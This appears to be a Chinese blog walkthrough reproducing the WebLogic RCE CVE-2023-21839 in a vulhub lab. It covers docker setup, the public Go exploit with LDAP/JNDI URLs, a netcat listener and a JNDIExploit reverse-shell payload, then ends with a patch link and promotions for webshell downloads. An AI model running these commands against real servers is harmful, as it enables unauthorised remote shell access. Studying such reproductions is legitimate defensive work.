漏洞复现|CVE-2023-21839 weblogicRCE

admin 2023年6月26日02:21:00评论137 views字数 1168阅读3分53秒阅读模式


声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 

 滑至文末,获取“webshell合集”下载链接!






一.影响范围

● weblogic_server = 12.2.1.3.0● weblogic_server = 12.2.1.4.0● weblogic_server = 14.1.1.1.0

二.环境搭建

 

这里我们使用vulhub上的环境来搭建

git clone  https://github.com/vulhub/vulhub.gitcd CVE-2023-21839/docker-compose up -d

漏洞复现|CVE-2023-21839 weblogicRCE

漏洞复现|CVE-2023-21839 weblogicRCE

想要查看密码可以查看容器日志 

docker logs 容器id

docker logs  3ce1194ddbab

漏洞复现|CVE-2023-21839 weblogicRCE

漏洞复现|CVE-2023-21839 weblogicRCE

二.漏洞复现

 

简单复现

vulhub 官方复现工具:GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 RCEhttps://github.com/4ra1n/CVE-2023-21839

漏洞复现|CVE-2023-21839 weblogicRCE

打开cmd文件夹里面有个main.go文件

使用方法为

go run main.go -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

这里先用dnslog测试一下

go run main.go -ip xxxxxxxx -port 7001 -ldap ldap://ab3x2c.dnslog.cn/evil

漏洞复现|CVE-2023-21839 weblogicRCE

RCE

利用 JNDIExploit 进行 getshell

下载地址https://github.com/zzwlpx/JNDIExploit

执行命令

先启动监听

nc -lvnp  7777

漏洞复现|CVE-2023-21839 weblogicRCE

然后启动 JNDIExploit

java -jar  JNDIExploit-1.2-SNAPSHOT.jar  -i  ip

执行exp

go run main.go -ip ip -port 7001 -ldap ldap://ip:1389/Basic/ReverseShell/ip/7777

执行成功

漏洞复现|CVE-2023-21839 weblogicRCE

三.修复建议

 

官方补丁

https://support.oracle.com/rs?type=doc&id=2917213.2

注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"



漏洞复现|CVE-2023-21839 weblogicRCE
点击上方公众号
漏洞复现|CVE-2023-21839 weblogicRCE
关注我们
漏洞复现|CVE-2023-21839 weblogicRCE








往期精彩

Xray反制的思考

近源渗透的几种方法

Docker深度学习(一)







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

原文始发于微信公众号(嗨嗨安全):漏洞复现|CVE-2023-21839 weblogicRCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月26日02:21:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|CVE-2023-21839 weblogicRCEhttps://cn-sec.com/archives/1829776.html

发表评论

匿名网友 填写信息